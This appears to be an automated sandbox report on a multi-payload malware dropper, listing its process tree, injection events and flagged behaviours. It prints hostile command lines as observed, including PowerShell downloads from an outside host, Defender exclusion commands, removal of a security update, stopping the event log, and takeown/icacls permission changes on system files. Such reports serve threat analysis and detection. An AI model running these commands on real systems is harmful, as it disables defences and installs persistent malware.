Token: SeSecurityPrivilege	2956	7z.exe
Token: SeRestorePrivilege	1496	7z.exe
Token: 35	1496	7z.exe
Token: SeSecurityPrivilege	1496	7z.exe
Token: SeSecurityPrivilege	1496	7z.exe
Token: SeRestorePrivilege	3244	7z.exe
Token: 35	3244	7z.exe
Token: SeSecurityPrivilege	3244	7z.exe
Token: SeSecurityPrivilege	3244	7z.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

crt.tmp

pid process

8372 crt.tmp
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

win1.exeAcroRd32.exe

pid process

8664 win1.exe
3044 AcroRd32.exe
3044 AcroRd32.exe
3044 AcroRd32.exe

pid	process
8372	crt.tmp

pid	process
8664	win1.exe
3044	AcroRd32.exe
3044	AcroRd32.exe
3044	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document mod.exeSetup.exeoutput.execrt.execomp.exe

description	pid	process	target process
PID 2740 wrote to memory of 1864	2740	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2740 wrote to memory of 1864	2740	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2740 wrote to memory of 1864	2740	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2740 wrote to memory of 1864	2740	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2740 wrote to memory of 1864	2740	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2740 wrote to memory of 684	2740	New Text Document mod.exe	AntiVirus2.exe
PID 2740 wrote to memory of 684	2740	New Text Document mod.exe	AntiVirus2.exe
PID 2740 wrote to memory of 684	2740	New Text Document mod.exe	AntiVirus2.exe
PID 2740 wrote to memory of 684	2740	New Text Document mod.exe	AntiVirus2.exe
PID 2740 wrote to memory of 8456	2740	New Text Document mod.exe	Setup.exe
PID 2740 wrote to memory of 8456	2740	New Text Document mod.exe	Setup.exe
PID 2740 wrote to memory of 8456	2740	New Text Document mod.exe	Setup.exe
PID 2740 wrote to memory of 8456	2740	New Text Document mod.exe	Setup.exe
PID 2740 wrote to memory of 8456	2740	New Text Document mod.exe	Setup.exe
PID 2740 wrote to memory of 8456	2740	New Text Document mod.exe	Setup.exe
PID 2740 wrote to memory of 8456	2740	New Text Document mod.exe	Setup.exe
PID 2740 wrote to memory of 8588	2740	New Text Document mod.exe	svchost.exe
PID 2740 wrote to memory of 8588	2740	New Text Document mod.exe	svchost.exe
PID 2740 wrote to memory of 8588	2740	New Text Document mod.exe	svchost.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 2740 wrote to memory of 8664	2740	New Text Document mod.exe	win1.exe
PID 2740 wrote to memory of 8664	2740	New Text Document mod.exe	win1.exe
PID 2740 wrote to memory of 8664	2740	New Text Document mod.exe	win1.exe
PID 8456 wrote to memory of 8636	8456	Setup.exe	comp.exe
PID 2740 wrote to memory of 1000	2740	New Text Document mod.exe	output.exe
PID 2740 wrote to memory of 1000	2740	New Text Document mod.exe	output.exe
PID 2740 wrote to memory of 1000	2740	New Text Document mod.exe	output.exe
PID 2740 wrote to memory of 1000	2740	New Text Document mod.exe	output.exe
PID 1000 wrote to memory of 3044	1000	output.exe	AcroRd32.exe
PID 1000 wrote to memory of 3044	1000	output.exe	AcroRd32.exe
PID 1000 wrote to memory of 3044	1000	output.exe	AcroRd32.exe
PID 1000 wrote to memory of 3044	1000	output.exe	AcroRd32.exe
PID 1000 wrote to memory of 2548	1000	output.exe	SIG.EXE
PID 1000 wrote to memory of 2548	1000	output.exe	SIG.EXE
PID 1000 wrote to memory of 2548	1000	output.exe	SIG.EXE
PID 1000 wrote to memory of 2548	1000	output.exe	SIG.EXE
PID 2740 wrote to memory of 3008	2740	New Text Document mod.exe	alabi.exe
PID 2740 wrote to memory of 3008	2740	New Text Document mod.exe	alabi.exe
PID 2740 wrote to memory of 3008	2740	New Text Document mod.exe	alabi.exe
PID 2740 wrote to memory of 3008	2740	New Text Document mod.exe	alabi.exe
PID 2740 wrote to memory of 4600	2740	New Text Document mod.exe	crt.exe
PID 2740 wrote to memory of 4600	2740	New Text Document mod.exe	crt.exe
PID 2740 wrote to memory of 4600	2740	New Text Document mod.exe	crt.exe
PID 2740 wrote to memory of 4600	2740	New Text Document mod.exe	crt.exe
PID 2740 wrote to memory of 4600	2740	New Text Document mod.exe	crt.exe
PID 2740 wrote to memory of 4600	2740	New Text Document mod.exe	crt.exe
PID 2740 wrote to memory of 4600	2740	New Text Document mod.exe	crt.exe
PID 4600 wrote to memory of 8372	4600	crt.exe	crt.tmp
PID 4600 wrote to memory of 8372	4600	crt.exe	crt.tmp
PID 4600 wrote to memory of 8372	4600	crt.exe	crt.tmp
PID 4600 wrote to memory of 8372	4600	crt.exe	crt.tmp
PID 4600 wrote to memory of 8372	4600	crt.exe	crt.tmp
PID 4600 wrote to memory of 8372	4600	crt.exe	crt.tmp
PID 4600 wrote to memory of 8372	4600	crt.exe	crt.tmp
PID 8636 wrote to memory of 2996	8636	comp.exe	FUT.au3
PID 8636 wrote to memory of 2996	8636	comp.exe	FUT.au3
PID 8636 wrote to memory of 2996	8636	comp.exe	FUT.au3
PID 8636 wrote to memory of 2996	8636	comp.exe	FUT.au3

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

2440 attrib.exe
3688 attrib.exe

pid	process
2440	attrib.exe
3688	attrib.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe
  "C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  PID:1864
- C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:684
- C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:8456
- - C:\Windows\SysWOW64\comp.exe
    C:\Windows\SysWOW64\comp.exe
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:8636
  - - C:\Users\Admin\AppData\Local\Temp\FUT.au3
      C:\Users\Admin\AppData\Local\Temp\FUT.au3
      4⤵
      Loads dropped DLL
      PID:2996
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 252
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:6456
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:8588
- C:\Users\Admin\AppData\Local\Temp\a\win1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\win1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:8664
- C:\Users\Admin\AppData\Local\Temp\a\output.exe
  "C:\Users\Admin\AppData\Local\Temp\a\output.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3044
- - C:\Users\Admin\AppData\Local\Temp\SIG.EXE
    "C:\Users\Admin\AppData\Local\Temp\SIG.EXE"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    PID:2548
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6724
- C:\Users\Admin\AppData\Local\Temp\a\alabi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3008
- C:\Users\Admin\AppData\Local\Temp\a\crt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Users\Admin\AppData\Local\Temp\is-NKJOL.tmp\crt.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-NKJOL.tmp\crt.tmp" /SL5="$3017C,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:8372
  - - C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
      "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i
      4⤵
      Executes dropped EXE
      PID:4988
  - - C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
      "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s
      4⤵
      Executes dropped EXE
      PID:5584
- C:\Users\Admin\AppData\Local\Temp\a\oiii.exe
  "C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:5180
- C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
  2⤵
  - Executes dropped EXE
  PID:8552
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    - Loads dropped DLL
    PID:9184
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:968
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p563741341569714296105326100 -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2584
  - - C:\Windows\system32\attrib.exe
      attrib +H "svcshost.exe"
      4⤵
      Views/modifies file attributes
      PID:2440
  - - C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe
      "svcshost.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:548
- C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:3252
- - C:\Users\Admin\AppData\Local\Temp\kat4B14.tmp
    C:\Users\Admin\AppData\Local\Temp\kat4B14.tmp
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:3436
- C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:5680
- - C:\Users\Admin\AppData\Local\Temp\kat5C72.tmp
    C:\Users\Admin\AppData\Local\Temp\kat5C72.tmp
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:5812
- C:\Users\Admin\AppData\Local\Temp\a\inte.exe
  "C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
  2⤵
  - Executes dropped EXE
  PID:7700
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit
    3⤵
    PID:1960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "inte.exe" /f
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1004
- C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies system certificate store
  PID:8404
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nse5EA6.tmp\abc.bat"
    3⤵
    PID:3912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5968
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6336
- C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  PID:908
- - C:\Windows\sysblardsv.exe
    C:\Windows\sysblardsv.exe
    3⤵
    - Modifies security service
    - Windows security bypass
    - Executes dropped EXE
    - Loads dropped DLL
    - Windows security modification
    PID:6132
  - - C:\Users\Admin\AppData\Local\Temp\1212912448.exe
      C:\Users\Admin\AppData\Local\Temp\1212912448.exe
      4⤵
      Executes dropped EXE
      PID:8572
    - - C:\Windows\syslmgrsvc.exe
        
        C:\Windows\syslmgrsvc.exe
        5⤵
        
        PID:6056
      - C:\Users\Admin\AppData\Local\Temp\1491825068.exe
        
        C:\Users\Admin\AppData\Local\Temp\1491825068.exe
        6⤵
        
        PID:1228
      - C:\Users\Admin\AppData\Local\Temp\172717314.exe
        
        C:\Users\Admin\AppData\Local\Temp\172717314.exe
        6⤵
        
        PID:1028
      - C:\Users\Admin\AppData\Local\Temp\322829355.exe
        
        C:\Users\Admin\AppData\Local\Temp\322829355.exe
        6⤵
        
        PID:3080
      - C:\Users\Admin\AppData\Local\Temp\53731040.exe
        
        C:\Users\Admin\AppData\Local\Temp\53731040.exe
        6⤵
        
        PID:7656
      - C:\Users\Admin\AppData\Local\Temp\2501326462.exe
        
        C:\Users\Admin\AppData\Local\Temp\2501326462.exe
        6⤵
        
        PID:4412
  - - C:\Users\Admin\AppData\Local\Temp\290924743.exe
      C:\Users\Admin\AppData\Local\Temp\290924743.exe
      4⤵
      PID:8116
    - - C:\Windows\winqlsdrvcs.exe
        
        C:\Windows\winqlsdrvcs.exe
        5⤵
        
        PID:8632
      - C:\Users\Admin\AppData\Local\Temp\3893518826.exe
        
        C:\Users\Admin\AppData\Local\Temp\3893518826.exe
        6⤵
        
        PID:8060
      - C:\Users\Admin\AppData\Local\Temp\2300410305.exe
        
        C:\Users\Admin\AppData\Local\Temp\2300410305.exe
        6⤵
        
        PID:7620
      - C:\Users\Admin\AppData\Local\Temp\1236434862.exe
        
        C:\Users\Admin\AppData\Local\Temp\1236434862.exe
        6⤵
        
        PID:4132
  - - C:\Users\Admin\AppData\Local\Temp\1577628941.exe
      C:\Users\Admin\AppData\Local\Temp\1577628941.exe
      4⤵
      PID:3500
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
        5⤵
        
        PID:8268
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
        5⤵
        
        PID:2116
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
        5⤵
        
        PID:5816
  - - C:\Users\Admin\AppData\Local\Temp\2157220217.exe
      C:\Users\Admin\AppData\Local\Temp\2157220217.exe
      4⤵
      PID:2008
    - - C:\Users\Admin\AppData\Local\Temp\1000613466.exe
        
        C:\Users\Admin\AppData\Local\Temp\1000613466.exe
        5⤵
        
        PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\2998211445.exe
      C:\Users\Admin\AppData\Local\Temp\2998211445.exe
      4⤵
      PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\30102721.exe
      C:\Users\Admin\AppData\Local\Temp\30102721.exe
      4⤵
      PID:5900
- C:\Users\Admin\AppData\Local\Temp\a\print.exe
  "C:\Users\Admin\AppData\Local\Temp\a\print.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:7676
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7240
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5372
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6196
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6428
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:3332
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3460
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3592
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:3616
- C:\Users\Admin\AppData\Local\Temp\a\222.exe
  "C:\Users\Admin\AppData\Local\Temp\a\222.exe"
  2⤵
  - Executes dropped EXE
  PID:5216
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    - Loads dropped DLL
    PID:8420
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:2104
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p209313910271864811381312692 -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_8.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:9180
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_7.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:320
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_6.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2872
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_5.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_4.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_3.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3244
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3444
  - - C:\Windows\system32\attrib.exe
      attrib +H "Installer.exe"
      4⤵
      Views/modifies file attributes
      PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
      "Installer.exe"
      4⤵
      Executes dropped EXE
      PID:3784
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8912
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3904
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:4924
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        
        PID:4220
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        
        PID:4272
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        
        PID:4364
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        
        PID:2428
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OARKQOLE"
        5⤵
        Launches sc.exe
        
        PID:4496
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:5352
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:5468
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OARKQOLE"
        5⤵
        Launches sc.exe
        
        PID:3180
- C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"
  2⤵
  - Executes dropped EXE
  PID:4708
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"
    3⤵
    PID:5268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "
      4⤵
      PID:6308
    - - C:\Windows\system32\reg.exe
        
        C:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
        5⤵
        
        PID:6972
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "Windows 7"
        5⤵
        
        PID:1976
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Users\Admin\AppData\Local\Temp /r /d y
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Users\Admin\AppData\Local\Temp /t /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3264
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\slwga.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3308
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\slwga.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3352
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\sppwmi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3392
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\sppwmi.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3420
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\systemcpl.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3452
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\systemcpl.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3480
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\user32.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3628
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\user32.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3672
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\winlogon.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3712
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\winlogon.exe /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3736
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\winver.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3796
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\winver.exe /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3836
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\sppcomapi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1044
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\sppcomapi.dll /deny users:(X)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4736
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\sppsvc.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3884
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\sppsvc.exe /deny "LOCAL SERVICE":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3980
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\winlogon.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3992
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\winlogon.exe /deny "LOCAL SERVICE":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7840
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\slwga.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\slwga.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8616
    - - C:\Windows\SysWOW64\takeown.exe
        
